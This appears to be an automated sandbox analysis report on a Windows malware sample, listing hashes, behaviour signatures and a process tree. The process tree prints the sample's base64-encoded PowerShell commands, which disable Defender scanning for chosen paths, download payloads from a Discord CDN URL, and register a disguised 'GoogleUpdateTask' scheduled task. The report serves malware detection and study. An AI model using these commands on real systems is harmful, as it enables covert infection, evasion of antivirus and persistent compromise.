Analysis
-
max time kernel
41s -
max time network
103s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
05-10-2022 11:04
Static task
static1
Behavioral task
behavioral1
Sample
c17c0259ca58b7412fbf9ec5a75e3ecc.exe
Resource
win7-20220812-en
General
-
Target
c17c0259ca58b7412fbf9ec5a75e3ecc.exe
-
Size
158KB
-
MD5
c17c0259ca58b7412fbf9ec5a75e3ecc
-
SHA1
13d2cc140cec0774a4daeb75dbf1333cf7bdf4ac
-
SHA256
38415959c6c2be67f3c96932dbfaa903b4d650d00b003c5b59340cb692560a51
-
SHA512
e428f6355c9fa60b891091e0a629f651968651e8f641e9d7759b3e197a498c88cbc657a8821f8f7abacdf72e1624a2472fead3a0bc116d36c87713f28b9b9ebe
-
SSDEEP
3072:+8bupux+SWv5NbwHw66vW2cSkkqFHhDMTYD8WUyy7GeLNcXOh:/2vcSkkqXDjDy3LNUOh
Malware Config
Signatures
-
Executes dropped EXE 4 IoCs
Processes:
unzip.exeunzip.exeunzip.exeunzip.exepid process 1340 unzip.exe 1984 unzip.exe 556 unzip.exe 520 unzip.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 3 ip-api.com -
Drops file in System32 directory 4 IoCs
Processes:
unzip.exeunzip.exeunzip.exeunzip.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk unzip.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk unzip.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk unzip.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk unzip.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1628 1044 WerFault.exe c17c0259ca58b7412fbf9ec5a75e3ecc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
c17c0259ca58b7412fbf9ec5a75e3ecc.exeunzip.exeunzip.exeunzip.exeunzip.exepid process 1044 c17c0259ca58b7412fbf9ec5a75e3ecc.exe 1044 c17c0259ca58b7412fbf9ec5a75e3ecc.exe 1044 c17c0259ca58b7412fbf9ec5a75e3ecc.exe 1044 c17c0259ca58b7412fbf9ec5a75e3ecc.exe 520 unzip.exe 1984 unzip.exe 1340 unzip.exe 556 unzip.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
c17c0259ca58b7412fbf9ec5a75e3ecc.exeunzip.exeunzip.exeunzip.exeunzip.exedescription pid process Token: SeDebugPrivilege 1044 c17c0259ca58b7412fbf9ec5a75e3ecc.exe Token: SeDebugPrivilege 520 unzip.exe Token: SeDebugPrivilege 1984 unzip.exe Token: SeDebugPrivilege 1340 unzip.exe Token: SeDebugPrivilege 556 unzip.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
unzip.execmd.execmd.exec17c0259ca58b7412fbf9ec5a75e3ecc.exeunzip.execmd.exedescription pid process target process PID 1340 wrote to memory of 1772 1340 unzip.exe cmd.exe PID 1340 wrote to memory of 1772 1340 unzip.exe cmd.exe PID 1340 wrote to memory of 1772 1340 unzip.exe cmd.exe PID 1340 wrote to memory of 1772 1340 unzip.exe cmd.exe PID 1772 wrote to memory of 1728 1772 cmd.exe netsh.exe PID 1772 wrote to memory of 1728 1772 cmd.exe netsh.exe PID 1772 wrote to memory of 1728 1772 cmd.exe netsh.exe PID 1772 wrote to memory of 1728 1772 cmd.exe netsh.exe PID 1340 wrote to memory of 1736 1340 unzip.exe cmd.exe PID 1340 wrote to memory of 1736 1340 unzip.exe cmd.exe PID 1340 wrote to memory of 1736 1340 unzip.exe cmd.exe PID 1340 wrote to memory of 1736 1340 unzip.exe cmd.exe PID 1736 wrote to memory of 436 1736 cmd.exe netsh.exe PID 1736 wrote to memory of 436 1736 cmd.exe netsh.exe PID 1736 wrote to memory of 436 1736 cmd.exe netsh.exe PID 1736 wrote to memory of 436 1736 cmd.exe netsh.exe PID 1044 wrote to memory of 1628 1044 c17c0259ca58b7412fbf9ec5a75e3ecc.exe WerFault.exe PID 1044 wrote to memory of 1628 1044 c17c0259ca58b7412fbf9ec5a75e3ecc.exe WerFault.exe PID 1044 wrote to memory of 1628 1044 c17c0259ca58b7412fbf9ec5a75e3ecc.exe WerFault.exe PID 520 wrote to memory of 1756 520 unzip.exe cmd.exe PID 520 wrote to memory of 1756 520 unzip.exe cmd.exe PID 520 wrote to memory of 1756 520 unzip.exe cmd.exe PID 520 wrote to memory of 1756 520 unzip.exe cmd.exe PID 1756 wrote to memory of 1012 1756 cmd.exe schtasks.exe PID 1756 wrote to memory of 1012 1756 cmd.exe schtasks.exe PID 1756 wrote to memory of 1012 1756 cmd.exe schtasks.exe PID 1756 wrote to memory of 1012 1756 cmd.exe schtasks.exe PID 520 wrote to memory of 1852 520 unzip.exe cmd.exe PID 520 wrote to memory of 1852 520 unzip.exe cmd.exe PID 520 wrote to memory of 1852 520 unzip.exe cmd.exe PID 520 wrote to memory of 1852 520 unzip.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c17c0259ca58b7412fbf9ec5a75e3ecc.exe"C:\Users\Admin\AppData\Local\Temp\c17c0259ca58b7412fbf9ec5a75e3ecc.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1044 -s 12002⤵
- Program crash
-
C:\ProgramData\Google\unzip.exe"C:\ProgramData\Google\unzip.exe" cmd.exe /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=21⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.82⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh interface ipv4 set dns name=Local Area Connection static 8.8.8.83⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=22⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=23⤵
-
C:\ProgramData\Google\unzip.exe"C:\ProgramData\Google\unzip.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAxADQANQAyADMAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAxADQANQAyADQAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAzADEANAA1ADYAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcANwAzADUANQAwADMAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBJAG4AcwB0AGEAbABsAFUAdABpAGwALgBlAHgAZQAnADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACcAcwBvAGYAdAB3AGEAcgBlAF8AcgBlAHAAbwByAHQAZQByAF8AdABvAG8AbAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcACoAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwASQBOAGUAdABDAGEAYwBoAGUAXABJAEUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIAAnAHUAbgB6AGkAcAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBjAG0AZAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBkAHcAbQAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcACoAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAnAA==1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Google\unzip.exe"C:\ProgramData\Google\unzip.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIAMQA5ADQAOQA1ADgANQAyADQAMgA5ADgAMAAzADYANgAvADEAMAAyADYAOQAwADEANAA4ADQANgA4ADUANwA2ADYANgA3ADYALwBvAGIAaQBlAHoAbgBuAGUALgBtAHMAaQAnACwAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcAHMAbwBmAHQAdwBhAHIAZQBfAHIAZQBwAG8AcgB0AGUAcgBfAHQAbwBvAGwALgBlAHgAZQAnACkAOwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcAHMAbwBmAHQAdwBhAHIAZQBfAHIAZQBwAG8AcgB0AGUAcgBfAHQAbwBvAGwALgBlAHgAZQA=1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Google\unzip.exe"C:\ProgramData\Google\unzip.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIAMQA5ADQAOQA1ADgANQAyADQAMgA5ADgAMAAzADYANgAvADEAMAAyADMAOQA0ADkANgAzADUAMQA5ADIAMQAxADEAMQA2ADQALwBjAG0AZAAuAG0AcwBpACcALAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlAFwARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgAxADkANAA5ADUAOAA1ADIANAAyADkAOAAwADMANgA2AC8AMQAwADIANgA5ADAAMAA2ADIANAA4ADgAMgA4ADEANQAwADcANwAvAHgAbQBsAG8AMgAuAG0AcwBpACcALAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwALgB4AG0AbAAnACkAOwBjAG0AZAAuAGUAeABlACAALwBjACAAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AeABtAGwAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwALgB4AG0AbAAiACAALwB0AG4AIAAiAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsAIgAgAC8AZgA7AGMAbQBkAC4AZQB4AGUAIAAvAGMAIABkAGUAbAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXAAuAHgAbQBsACIA1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del C:\Windows\Temp\.xml2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Google\unzip.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
C:\ProgramData\Google\unzip.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
C:\ProgramData\Google\unzip.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
C:\ProgramData\Google\unzip.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
memory/436-71-0x0000000000000000-mapping.dmp
-
memory/520-82-0x0000000073DF0000-0x000000007439B000-memory.dmpFilesize
5.7MB
-
memory/520-63-0x0000000073DF0000-0x000000007439B000-memory.dmpFilesize
5.7MB
-
memory/520-76-0x0000000073DF0000-0x000000007439B000-memory.dmpFilesize
5.7MB
-
memory/556-77-0x0000000073DF0000-0x000000007439B000-memory.dmpFilesize
5.7MB
-
memory/556-66-0x0000000073DF0000-0x000000007439B000-memory.dmpFilesize
5.7MB
-
memory/556-78-0x0000000073DF0000-0x000000007439B000-memory.dmpFilesize
5.7MB
-
memory/1012-80-0x0000000000000000-mapping.dmp
-
memory/1044-54-0x0000000000B50000-0x0000000000B7E000-memory.dmpFilesize
184KB
-
memory/1340-58-0x0000000075071000-0x0000000075073000-memory.dmpFilesize
8KB
-
memory/1340-64-0x0000000073DF0000-0x000000007439B000-memory.dmpFilesize
5.7MB
-
memory/1340-73-0x0000000073DF0000-0x000000007439B000-memory.dmpFilesize
5.7MB
-
memory/1628-75-0x0000000000000000-mapping.dmp
-
memory/1728-68-0x0000000000000000-mapping.dmp
-
memory/1736-70-0x0000000000000000-mapping.dmp
-
memory/1756-79-0x0000000000000000-mapping.dmp
-
memory/1772-67-0x0000000000000000-mapping.dmp
-
memory/1852-81-0x0000000000000000-mapping.dmp
-
memory/1984-65-0x0000000073DF0000-0x000000007439B000-memory.dmpFilesize
5.7MB
-
memory/1984-74-0x0000000073DF0000-0x000000007439B000-memory.dmpFilesize
5.7MB